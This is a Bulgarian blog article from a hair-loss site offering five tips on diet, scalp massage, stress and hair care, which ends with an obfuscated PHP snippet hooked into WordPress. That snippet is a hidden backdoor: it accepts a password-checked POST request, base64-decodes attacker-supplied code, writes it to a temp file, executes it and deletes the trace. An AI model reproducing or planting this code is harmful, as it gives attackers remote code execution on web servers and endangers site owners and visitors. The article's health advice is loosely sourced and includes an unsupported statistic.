Как да намалим лесно риска от косопад | Косопад

5 лесни съвета за намаляване риска от косопад

превенция на косопад

Превенция на косопад

Често ли се страхувате, че ще останете без коса, когато виждате калъфката си зарината с косми след ставане от сън? Ако това е така ще Ви разочароваме, защото Вие страдате от косопад. Много неприятна тема особено за жените, за които оплешивяването е по – лошо и от най – тежката болест.

Състоянието на косопад е сред най – често срещаните проблеми в съвременното общество. Загубата на коса може да се дължи на цял куп причини и почти винаги е свързано с начина на живот. Колко от вас полагат достатъчни грижи за косата си и се стараят да живеят здравословно поне малко? Отговорът е потресаващ. Защото според последните проучвания, едва 12 % от световното население избягва вредните хранителни навици и стреса.

Kosopad-bg.net е създаден с идеята да помага на хората с косопад. В тази статия Ви предлагаме няколко лесни мерки, които можете да изпълните без да губите от времето си твърде много и да сведете до минимум предпоставките за поява на косопад.

Веднъж завинаги кажете НЕ на вредните храни

Първата битка във войната за здрава и красива коса, е да преминете незабавно към здравословна диета и висока двигателна активност. Включете в диетата си богати на протеин храни като месо, яйца, мляко, пшеница, овес, царевица, а бобът и зеленият грах също са чудесни източници на растителни протеини. Също така пийте много вода, защото тя не просто поддържа кожата и косата здрави, но подхранва корените. Друг важен съвет е да не правите необмислени и небалансирани хранителни диети, тъй като недостигът на вещества е сериозна предпоставка за косопад.

Ежедневен масаж на косата

Всекидневният масаж на косата със затоплено етерично масло е сред най – добрите начини да се предпазите от косопад. Втрийте натурално масло в скалпа и масажирайте за около десет минути, след това останете без да се миете около два часа. Така ще хидратирате кожата, а полезните съставки ще подхранят космените фоликули. Можете да масажирате с масло от орех, бадем, амла или просто с чист зехтин.

Изхвърлете стреса

Да. Просто надскочете себе си и забравете за тревогите. Намерете начин да се отървете от проблемите поне за час на ден и през това време натиснете бутона Power Off. Стресът е сред основните фактори, които предизвикват косопад. Опитайте се да го контролирате чрез йога, медитация и / или дихателни упражнения.

Грижи за косата

От години съществува наръчник с най – общи грижи за косата. За съжаление, навярно твърде малко от вас спазват тези предписания и по този начин сами се излагат на риск от косопад.

  • Избягвайте да излагате косата си на твърде горещо, независимо какъв е източника – вода, сешоар, маша и др. Космените фоликули са крехки и жегата лесно ще пречупи косъма.
  • Купете си подходяща четка. Разресвайте внимателно, без да бързате и дърпате със сила.
  • Избягвайте изтощителните прически като опъната назад коса и кок. Те често предизвикват травматичен косопад.
  • Ограничете стайлинга до пределния минимум, за да се предпазите от изтощаване и скъсване на косъма.

Изберете здравословния начин на живот

Здравословният живот е от ключово значение не само при съмнения за косопад, но и за цялото тяло. Не слушайте тези които говорят, че не искат да живеят с орлите и ще правят каквото им скефне. Забравете за алкохола, цигарите и вредните храни, за наркотиците въобще не трябва и да говорим. Вие сами решете как да живеете – свободни и щастливи, или вечно борещи се с някаква зависимост.

08. юни 2013 12:01:25 от Косопад
Категории: Косопад – Статии | Етикети: , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}